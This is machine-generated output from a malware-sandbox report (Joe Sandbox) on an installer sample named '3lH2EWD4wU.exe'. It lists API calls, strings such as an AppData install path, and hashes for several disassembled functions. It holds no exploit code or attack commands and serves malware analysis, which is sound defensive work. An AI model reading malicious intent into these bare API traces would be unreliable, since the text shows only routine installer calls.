                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                                                  APIs
                                                  • SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                  • Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
                                                  • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                  • Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C
                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                  • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                                  • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                  • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                  • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                                                  • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                  • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404A67
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                                                  • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                                                  • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                                                  • DeleteObject.GDI32(00000000), ref: 00404B3A
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                                                  • ShowWindow.USER32(?,00000005), ref: 00404C93
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
                                                  • GlobalFree.KERNEL32(00000000), ref: 00404E73
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                                                  • ShowWindow.USER32(?,00000000), ref: 00405012
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                                                  • ShowWindow.USER32(00000000), ref: 00405024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                                  • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                                                  • Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                                  • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404520
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                                                  • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404606
                                                  • lstrcmpiA.KERNEL32(: Completed,Agitationers Setup: Completed), ref: 00404638
                                                  • lstrcatA.KERNEL32(?,: Completed), ref: 00404644
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                                    • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                                                    • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                    • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                    • Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                    • Part of subcall function 0040620A: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                  • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                                    • Part of subcall function 00404888: lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                    • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                                    • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: : Completed$A$Agitationers Setup: Completed$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Triu,fe$
                                                  • API String ID: 2624150263-2786071686
                                                  • Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                                  • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                                                  • Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                                  • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                                                  APIs
                                                  • DeleteFileA.KERNEL32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
                                                  • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
                                                  • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                                                  • FindClose.KERNEL32(00000000), ref: 004058CF
                                                  Strings
                                                  • \*.*, xrefs: 004057D3
                                                  • "C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00405768
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3971466533
                                                  • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                                  • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                                                  • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                                  • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00402193
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
                                                  • API String ID: 123533781-1999411507
                                                  • Opcode ID: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
                                                  • Instruction ID: e240bf9bd5167367365347af51bd1272e3bc3770d4ab5d97d329ed4db4fc5742
                                                  • Opcode Fuzzy Hash: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
                                                  • Instruction Fuzzy Hash: 81510771A00208BFCF10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
                                                  • Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
                                                  • Opcode Fuzzy Hash: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
                                                  • Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                  • Instruction ID: 39e82714288353bf73825cbb988a8a6af090c2e25faa9df829ed1fe8e01e3ef1
                                                  • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                  • Instruction Fuzzy Hash: CFE18A71900706DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1E738AA91CF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                  • Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
                                                  • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                  • Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                                                  • GetSysColor.USER32(?), ref: 00404278
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                                                  • lstrlenA.KERNEL32(?), ref: 00404299
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                                                  • SendMessageA.USER32(00000000), ref: 00404322
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                                                  • SetCursor.USER32(00000000), ref: 004043A5
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                                                  • SetCursor.USER32(00000000), ref: 004043BE
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
